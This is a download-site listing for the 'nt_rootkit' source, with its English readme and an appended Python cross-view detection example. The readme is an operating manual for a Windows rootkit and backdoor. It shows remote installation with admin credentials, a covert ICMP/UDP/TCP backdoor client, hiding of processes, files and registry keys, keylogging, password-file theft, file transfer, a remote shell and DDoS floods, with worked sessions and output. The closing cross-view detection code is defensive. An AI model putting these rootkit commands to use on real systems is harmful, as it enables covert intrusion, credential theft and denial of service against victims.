nt_rootkit

Category: Other
Development tool: Visual C++
File size: 11KB
Downloads: 63
Upload date: 2007-04-23 15:47:12
Uploader: alyo
Description: NT_rootkit source code written by a member of a foreign rootkit group.

yyt_hac's ntrootkit 1.1 Readme

The first thing you should know about this rootkit is that the built-in backdoor can communicate with the client in 4 ways (0:Userdefined, 1:Icmp, 2:Udp, 3:Tcp). These are all connectionless, so a utility like fport.exe will not show a connection, since there isn't one. TCP and UDP are the most reliable. Also of importance is that the default password is yyt_hac. This can and should be changed, but for connecting to the backdoor for the first time it must be used.

-Local Installation and Commandline Options

C:\WINNT\system32>ntrootkit -h
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Usage:ntrootkit \\ip -u username -p password
ip              the computer you want to install ntrootkit on
-u [username]   admin account on remote computer
-p [password]   admin password on remote computer
Usage:ntrootkit [-v/-m/-u [password]/-i [password]]
-v              show the ntrootkit version that is installed
-u [password]   uninstall the ntrootkit
-i [password]   update the ntrootkit, the new version will be run after reboot
-m              show the work mode of the ntrootkit
-m [workmode]   set the workmore of the rootkit (0=sniffer, 1=driver)

C:\WINNT>ntrootkit          //local install, run without any options
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Exacting files.....ok
Installing service..ok
Starting up The Ntrootkit..ok
The Ntrootkit is installed and started successfully!

C:\WINNT>ntrootkit -m
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
The ntrootkit is using windows 2000 sniffer mode to recv packet
//This mode is not very stable, driver mode is highly recommended

C:\WINNT\>ntrootkit -v
ntrootkit -v
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
The Version of Ntrootkit that is installed is 1.1

C:\WINNT\system32>ntrootkit -i [password]   //update rootkit
ntrootkit -i yyt_hac
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Please enter you password:
Please wait a minute.....
Update successfully,the new version very runs after system reboots!

-Remote Installation

F:\letmein>ntrootkit \\202.38.*.* -u administrator -p 123456
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Connecting to remote computer...ok
Exacting files.....ok
Installing service..ok
Starting up The Ntrootkit..ok
Disconnecting...ok
The Ntrootkit is installed and started successfully!

-Backdoor

L:\c\rootkit\44\RTCLIENT\Release>rtclient
It is yyt_hac's ntrootkit client 1.1
Welcome to http://www.yythac.com
usage:rtclient destip [-p password] [-t proto] [-o port] [-y icmp_type] [-d icmp_code] [-m MTU] [-c Command]
destip-------------The computer you want to connect
password-----------The ntrootkit's password
proto--------------The proto that ntrootkit will use(0:userdefined,1:icmp,2:udp,3:tcp)
port---------------The dest udp or tcp port which send packet to (default is 445)
MTU----------------The MAX packet size the ntrootkit will use to send packet(if not provided ,the program will get it automatically )
icmp_type----------The icmp packet type which send to server,default is ICMP_ECHO REPLY
icmp_code----------The icmp packet code which send to server,default is 0
Command------------The command which you want the server to do
The DDos command usage:DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]
DDos_Destip--------The computer you want to DDos
DDos_Destport------The Destport you want to DDos (default is 445)
DDos_type----------The DDos type you want to use (0:ping flood,1:udp flood,2:synflood,3:mstream flood,default is 0)
DDos_seconds-------The seconds you want to DDos the dest (default is 150s)
DDos_ProcCount-----The process count which the server use to ddos (default is 10)
//the only required commandline options are destip and password, the others have default values

L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3
It is yyt_hac's ntrootkit client 1.0
Welcome to http://www.yythac.com
Getting ip address of the computer...
1. 1.1.1.89
2. 1.1.1.200
Please Select the number of the ip address you want to use to send and recv packet:1
Time out,Please make sure the target is up and try again
//if the default port of 445 does not work, try another with the -o option

L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 -o 139
It is yyt_hac's ntrootkit client 1.1
Welcome to http://www.yythac.com
Getting ip address of the computer...
1. 1.1.1.89
2. 1.1.1.200
Please Select the number of the ip address you want to use to send and recv packet:1
Welcome to yyt_hac's ntrootkit Server 1.0,use '?' command to get command list

CMD>?
********yyt_hac's ntrootkit Server Command List********
?-------------------------------Show this list
HideFileDir [FileName or DIR]----------------------Hide the file or directory
HideProcId [pid]----------------Hide process with the id
HideProcName [procname]---------Hide process with the process name
HideKey [KeyName]---------------Hide a registry key
HideValue [ValueName]-----------Hide a registry value
HideUser [UserName]-------------Hide a User
HideServ [ServiceName]----------Hide a Service
ShowFileDir FileName or DIR-----UnHide the file or directory that been hidden before
ShowProcId pid------------------UnHide the process that been hidden before with the id
ShowProcName procname-----------UnHide the process that been hidden before with the process name
ShowKey KeyName-----------------UnHide the registry key
ShowValue ValueName-------------UnHide the registry value
ShowUser UserName---------------UnHide the user that been hidden before
ShowServ ServiceName------------UnHide the service that been hidden before
Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer
Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer
KeyLogOn------------------------------Start key log
KeyLogOff-----------------------------Stop key log
DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]---DDos the destip
SDDOS---------------------------------Stop DDos
GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password file to local computer
DelPwd--------------------------------Del the ntrootkit keylog password file
Ps------------------------------------Show all processes on remote machine
Kill pid------------------------------Kill the process with the id or name
RTVer---------------------------------Show Ntrootkit server version and author info
SetPass [NewPassword]-----------------Change or show the connection password
Reboot--------------------------------Reboot the targer computer
OpenShell-----------------------------Open a command shell
Exit----------------------------------Exit the shell or rootkit

//notes
HideKey, HideServ, etc.: call any Hide* command without a parameter to see a list of currently hidden items
HideUser [UserName]-------------------Not implemented yet
HideServ [ServiceName]----------------Hide a service by service name, NOT display name

CMD>ps          //list processes, including hidden ones
ProcessID ProcessName
0 [System Process]
8 System
176 smss.exe
200 csrss.exe
224 WINLOGON.EXE
252 services.exe
2*** LSASS.EXE
452 svchost.exe
508 spoolsv.exe
536 NETDDE.EXE
13*** ntfrs.exe
1392 NTservice.exe
1404 NTweb.exe
1412 CCP.exe
1900 termsrv.exe
1952 winmgmt.exe
1968 winvnc.exe
1992 dns.exe
2032 inetinfo.exe
2076 ismserv.exe
2512 explorer.exe
2720 internat.exe
2728 sqlmangr.exe
2652 plog.exe
2624 SysArchive.exe
2752 svchost.exe
3160 DWRCS.EXE
11544 SpntSvc.exe
23028 CCProxy.exe
27096 mshta.exe
27***0 PSEXESVC.EXE
28008 cmd.exe
27872 rtkit.exe

CMD>kill 27096
process is been killed !

CMD>rtver
The ntrootkit version is 1.1, welcome to http://www.yythac.com

CMD>hideprocid          //list hidden processes
The Hide ProcId:

CMD>keylogon          //start keylogger
Key log Start successfully

CMD>ddos 202.202.23.3.14 139 2 30          //DoS 202.23.3.14 with a syn flood on port 139 for 30 sec
DDos dip:202.23.3.14,DDos dport:139,DDos type:2,DDos seconds:30,DDos process count:10,
DDos started successfully!

CMD>ddos 202.23.3.14 139 2 30          //can only do one DoS at a time
DDos already started

CMD>sddos          //stop the running DoS attack
Stop DDos sucessfully!

CMD>openshell          //windows command shell
Microsoft Windows 2000 [版本 5.00.2195]
(C) Copyright 1***5-2000 Microsoft Corp.

C:\WINNT\system32>hideprocid          //1500 is the command shell's procid; it is added to the hidden list automatically and deleted again after exit
The Hide ProcId: 1500

C:\WINNT\system32>cd \
cd \

C:\>dir/w
dir/w
磁碟區 C 中的磁碟沒有標籤。
磁碟區序號: B472-5102
目錄: C:\
89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] 新建 文本文?.txt
19 個檔案 3,586,720 位元組
10 個目錄 1,213,169,6*** 位元組可用

C:\>hidefiledir *logfile.txt          //hide any file that ends with (or is called) logfile.txt
HideFileDir:successfully

C:\>dir/w
dir/w
磁碟區 C 中的磁碟沒有標籤。
磁碟區序號: B472-5102
目錄: C:\
89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] 新建 文本文?.txt
18 個檔案 3,586,582 位元組
10 個目錄 1,213,169,6*** 位元組可用

C:\>hidefiledir          //the file was hidden successfully; it is missing from the listing above
The Hide File or Dir: *LOGFILE.TXT

C:\>showfiledir *logfile.txt          //unhide *logfile.txt
ShowFileDir:successfully

C:\>showfiledir *logfile.txt
ShowFileDir:already hidden or not found

C:\>dir/w          //there it is again
dir/w
磁碟區 C 中的磁碟沒有標籤。
磁碟區序號: B472-5102
目錄: C:\
89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] 新建 文本文?.txt
19 個檔案 3,586,720 位元組
10 個目錄 1,213,169,6*** 位元組可用

C:\>get tsc.zip          //the file must exist
Can't open file

C:\>get c:\tsc.zip d:\zips\tsc.zip          //download c:\tsc.zip to d:\zips\tsc.zip
................................................................................
................................................................................
..................Get file sucssesfully!

C:\>put c:\logfile.txt c:\f.txt          //upload c:\logfile.txt to c:\f.txt
.....Put file successfully!

C:\>dir/w
dir/w
磁碟區 C 中的磁碟沒有標籤。
磁碟區序號: B472-5102
目錄: C:\
89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] f.txt [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] 新建 文本文?.txt
20 個檔案 3,593,221 位元組
10 個目錄 1,213,161,472 位元組可用

C:\>del f.txt
del f.txt

C:\>exit          //exit the shell, back to the backdoor prompt

CMD>exit          //exit the backdoor
exit successfully
bye bye

F:\letmein>

-Notes

1. If you and the target machine do not have an external address, then you can only use the tcp/udp protocol for the backdoor, but you may still specify a different port.
2. Since the backdoor is connectionless you must piggyback on an existing open port like those below:
   UDP - 445,137,138,500,4000,53,etc
   TCP - 445,139,80,21,23,135,53,etc
3. Backdoor client and rootkit on the same machine cannot communicate. Meaning trying to connect to localhost using the client will not work.
4. Machines with valid external ips can use TCP/UDP/ICMP. TCP/UDP are recommended unless the machine is locked up tight but pings can get through, in which case ICMP is the best choice.
5. If you do not exit the backdoor properly, with the exit command, then wait a few minutes before reconnecting.
6. If you use the sniffer working mode the backdoor can be unreachable under high network traffic volume; use at your own judgement.
7. Do not forget to change the rootkit password with the SetPass command; the default is yyt_hac.
8. Use corresponding client and rootkit versions; backwards and forwards compatibility is not guaranteed.

-Thanks to Joe Warshaw for this English readme

Web:http://www.yythac.com
Email:webmaster@yythac.com
QQ:47090005
icq:272288117
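The HideProcId and HideFileDir commands in the transcript above work by filtering what an enumeration returns: the hidden cmd.exe (pid 1500) and the hidden logfile.txt are still there, they just no longer appear in the listing the user-mode tool gets. The standard defender-side check for this is a cross-view diff: take the same listing from two vantage points (the live user-mode view versus an offline disk image, a kernel-level enumerator, or a pre-infection snapshot) and report what appears in one but not the other. The Python below is an added example written for this page, not code from ntrootkit or its readme; the process and directory listings it uses are constructed samples modeled on the transcript, and the "trusted" view is an assumed second vantage point rather than anything the rootkit provides.

```python
"""Cross-view diff for hidden processes and files (added example, not part of ntrootkit).

A rootkit that filters enumeration results makes an entry vanish from the
view a user-mode tool gets, but not from a view taken elsewhere. Comparing
the two views exposes the difference. Every listing below is a constructed
sample modeled on the readme transcript, not a capture from a real host.
"""
import fnmatch
import re
from typing import Dict, List

# Constructed sample: process view from a trusted vantage point
# (offline image / kernel enumeration / pre-infection snapshot) ...
TRUSTED_PS = """ProcessID ProcessName
0 [System Process]
8 System
176 smss.exe
200 csrss.exe
1500 cmd.exe
27872 rtkit.exe
"""

# ... and what a user-mode tool on the same host lists after two PIDs are hidden.
USERMODE_PS = """ProcessID ProcessName
0 [System Process]
8 System
176 smss.exe
200 csrss.exe
"""

# Constructed directory listings (names only), trusted view vs. user-mode view.
TRUSTED_DIR = ["89.bat", "logfile.txt", "ra_slave.log", "tsc.zip", "WINNT"]
USERMODE_DIR = ["89.bat", "ra_slave.log", "tsc.zip", "WINNT"]

# One row of a ps-style listing: numeric pid, whitespace, then the name.
_PS_LINE = re.compile(r"^\s*(\d+)\s+(.+?)\s*$")


def parse_ps(text: str) -> Dict[int, str]:
    """Parse 'pid name' rows; the header row has no numeric pid and is skipped."""
    procs: Dict[int, str] = {}
    for line in text.splitlines():
        m = _PS_LINE.match(line)
        if m:
            procs[int(m.group(1))] = m.group(2)
    return procs


def hidden_processes(trusted: str, usermode: str) -> Dict[int, str]:
    """PIDs present in the trusted view but absent from the user-mode view."""
    t, u = parse_ps(trusted), parse_ps(usermode)
    return {pid: name for pid, name in t.items() if pid not in u}


def hidden_files(trusted: List[str], usermode: List[str]) -> List[str]:
    """Names in the trusted listing that are missing from the user-mode one.

    The comparison is case-insensitive because NTFS file names are.
    """
    seen = {n.lower() for n in usermode}
    return sorted(n for n in trusted if n.lower() not in seen)


def matches_hide_pattern(name: str, pattern: str) -> bool:
    """Does a name fall under a HideFileDir-style wildcard?

    The transcript shows '*logfile.txt' being stored as '*LOGFILE.TXT', so the
    match is case-insensitive. This maps a recovered hide list back to files.
    """
    return fnmatch.fnmatchcase(name.lower(), pattern.lower())


def report() -> str:
    """Human-readable summary; the functions above return the raw findings."""
    lines = []
    for pid, name in sorted(hidden_processes(TRUSTED_PS, USERMODE_PS).items()):
        lines.append(f"hidden process: pid={pid} name={name}")
    for name in hidden_files(TRUSTED_DIR, USERMODE_DIR):
        lines.append(f"hidden file: {name}")
    return "\n".join(lines) if lines else "no discrepancies between views"


if __name__ == "__main__":
    print(report())
```

The hard part in practice is obtaining the trusted view: on a live Windows host that means an enumeration path the hooks do not cover, and when that cannot be guaranteed, an offline image of the disk. The wildcard matcher is there because the readme's hide list is pattern-based (`*logfile.txt` hides every name ending in logfile.txt), so an analyst who recovers the list still has to resolve it against the file system.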
